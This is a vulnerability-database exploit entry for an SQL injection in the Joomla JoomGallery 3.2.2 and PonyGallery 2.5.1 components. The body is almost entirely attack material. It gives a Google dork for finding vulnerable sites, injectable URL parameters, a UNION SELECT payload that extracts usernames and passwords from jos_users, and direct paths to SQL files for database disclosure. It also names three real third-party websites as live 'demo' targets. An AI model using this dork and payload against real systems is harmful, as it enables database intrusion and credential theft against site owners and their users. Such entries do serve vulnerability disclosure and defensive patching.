Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Injection

2019.02.18
us NikbinHK (US) us
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:''/index.php?option=com_ponygallery''

############################################################################ # Exploit Title: [Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Injection ] # Google Dork: inurl:''/index.php?option=com_ponygallery'' # Date: 2/13/2019 # Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin # Vendor Homepage: joomlander.net - joomlacode.org # Software Link: github.com/JoomGallery/JoomGallery/archive/master.zip # Version: 3.3.0 3.2.2 for Joomla 3.x and previous versions. # Tested on: win,linux ###################################################################################### # Exploit : ********************** /index.php?option=com_ponygallery&Itemid=[SQL Injection] /index.php?option=com_ponygallery&Itemid=[SQL Injection] /index.php?option=com_ponygallery&Itemid=[SQL Injection]&func=special # Example Payload : ************************************* %20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/* # Database Disclosure Exploit : *************************** /administrator/components/com_joomgallery/sql/install.mysql.utf8.sql /administrator/components/com_joomgallery/sql/uninstall.mysql.utf8.sql # Exploit /administrator/components/com_joomgallery/sql/updates/mysql/[Version].sql version : (2.0.0 , 2.0.0 , 2.1.0 , 3.0.0 , 3.1.0 , 3.2.0 , 3.2.1, 3.3.0 ) for Example : /administrator/components/com_joomgallery/sql/updates/mysql/2.0.0.sql #################################################################### [+] Demo : skhssco.org.mo/index.php?option=com_joomgallery&func=viewcategory&catid=113&startpage=1&substartpage=3&Itemid=5%27&lang=en [+] Demo : okokratt.ee/gamezone/index.php?option=com_joomgallery&func=viewcategory&catid=7&startpage=1&substartpage=1&Itemid=44%27&lang=en [+] Demo : cimbria.net/joomla/index.php?option=com_ponygallery&Itemid=38%27 [+] TNX to ======> @dgtaIboy | @Deruw | @servering | Ehsan KOoRN | @AhmadBlocker | @NimaProgrammer01 | @Sir_Developer [+] @Perilous_ManR | @DLuxC4 | @FreeHK | @UniCracker | @BacheGorbeh | @khal0o | @SoheilMV_1996 | @SiR_Li0SioN | @Mahdigh_7 [+] @im_krypton | @Aliwin1 | @midnightcracker ]


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top